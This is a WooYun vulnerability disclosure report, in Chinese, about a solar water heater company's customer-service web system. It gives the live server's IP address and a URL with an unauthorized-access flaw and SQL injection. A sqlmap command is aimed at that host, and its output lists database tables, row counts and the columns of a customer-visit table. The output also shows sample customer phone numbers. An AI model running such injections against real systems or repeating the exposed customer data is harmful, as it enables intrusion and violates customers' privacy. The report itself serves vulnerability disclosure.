乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
反正我是没用太阳能热水器
亿家能太阳能客服系统
http://218.56.138.156:8080/web/manager/
存在越权url
http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456
其中agentNo是可以任意变换的此处也是一处sql注入漏洞
sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs
查看当前库是ecs
列表列数据量
Database: ecs+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.chanpinxinxi | 1232569 || dbo.salebill | 989634 || dbo.fahuoxinxi | 971554 || dbo.vistorBack | 518859 || dbo.building | 515518 || dbo.ProductSwap | 407312 || dbo.UserTable | 212813 || dbo.callerWorkStat | 150036 || dbo.LinkTelArea | 138625 || dbo.telInfo | 138280 || dbo.AssessmentFactorInfo | 42993 || dbo.SettleAccountsItems | 36245 || dbo.HistorySettleAccountsItems | 17834 || dbo.Tmp | 16654 || dbo.xilieinfo | 7161 || dbo.city | 3238 || dbo.UserRole | 2595 || dbo.refer | 2584 || dbo.Pd_Process | 2582 || dbo.pd | 2484 || dbo.v_goods | 2445 |
工单回访表:
vistorBack
列columns
Table: vistorBack[32 columns]+------------------+---------+| Column | Type |+------------------+---------+| AgentNo | varchar || BuildingResult | varchar || callTel | varchar || Card | varchar || content | varchar || firstVistorDate | varchar || Id | bigint || Isbw | int || IsDel | varchar || Isgd | int || Ispj | int || IsVisitor | varchar || LeaveBillNo | varchar || LeaveBillNo2 | varchar || memom | varchar || openTime | varchar || operateDate | varchar || other | varchar || Province | varchar || Reason | varchar || require | varchar || satisfaction | varchar || secondVistorDate | varchar || ServiceType | varchar || thirdVistorDate | varchar || verify | int || verifyContent | varchar || verifyDate | varchar || verifyPerson | varchar || verifyValidate | int || VistorTime | varchar || zt | varchar |+------------------+---------+
涉及客户信息,列号码字段数据演示:
Database: ecsTable: vistorBack[4 entries]+--------------+| callTel |+--------------+| 051683202555 || 83686959 || 85696735 || 87792024 |+--------------+
皇明太阳能客服系统
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)